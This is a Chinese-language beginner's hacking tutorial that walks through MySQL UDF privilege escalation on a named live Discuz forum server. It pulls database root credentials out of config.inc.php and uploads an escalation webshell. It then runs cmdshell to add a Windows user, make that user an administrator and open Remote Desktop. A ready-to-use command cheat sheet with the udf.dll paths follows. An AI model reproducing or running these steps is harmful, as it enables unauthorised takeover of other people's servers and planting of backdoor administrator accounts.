由于上网实在是没事做.就给大家做一个教程.只适合新手哦.好了.我们开始吧~

这个是演示目标；http://bbs.tanw.net/include/magic/hackp.php

我们来看看这个论坛。流量还行~是discuz的论坛.这里就不讨论怎么得到这个权限.

今天的主题是：mysql提权.这是主目录.看到没。config.inc.php 这个文件.

pw dz都有这个配置文件.我们今天就要利用这个文件透露的信息来做大文章.下载下来看下.

$dbhost = ’localhost’; // 数据库服务器
$dbuser = ’root’; // 数据库用户名
$dbpw = ’123456’; // 数据库密码
$dbname = ’discuz’; // 数据库名
$pconnect = 0; // 数据库持久连接 0=关闭, 1=打开

好了.我们再上传个提权马.host: 这里填本地.MYSQL连结成功.好了.看我操作..

这个论坛是2003的.出错了.可能是我刚才导出了一遍.不管他.我们做下一步.

cmdshell(’net user hackp 123456 /add’)

命令成功完成。

--------------------------------------------完成!

-----------------------------------

在服务器里建立了个用户.我们来提升hackp为管理.

cmdshell(’net localgroup administrators hackp /add’)

命令成功完成。

--------------------------------------------完成!

-----------------------------------

OK.看执行语句.我们是把hackp用户提升为管理了.我们来看看端口

直接用3389连看下有没开也行。

admin:hackp
pw: 123456

看到没.等到晚上肯定就能连接了.好了.教程就到这里

先找ROOT账户

C:\Winnt\udf.dll 2000
C:\Windows\udf.dll 2003

现在基本上win的服务器就这两个导出UDF.DLL

create function cmdshell returns string soname ’udf.dll’
select cmdshell(’net user user password /add’);
select cmdshell(’net localgroup administrators user /add’);
select cmdshell(’e:\3389.exe’);
drop function cmdshell; 删除函数